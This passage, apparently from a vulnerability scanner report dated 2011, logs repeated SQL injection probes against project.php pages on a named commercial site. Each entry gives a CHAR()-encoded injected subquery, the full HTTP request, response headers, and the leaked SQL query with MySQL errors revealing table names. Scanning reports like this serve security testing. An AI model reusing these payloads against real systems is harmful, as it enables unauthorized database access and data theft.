convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/bulo00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iar9h3u8k91u168q9242du67l4; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pbbvsla13h2ld0e3sr9aj1u6d5; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/obtm00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j836bi4plnuj9pbmbo7iu0clq5; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/obtm00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/parl00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6hr2g3rud7uupus7m31485c9g3; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select 
convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n5hg8lkmiscark5lpoeuadar45; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc='+ (select 
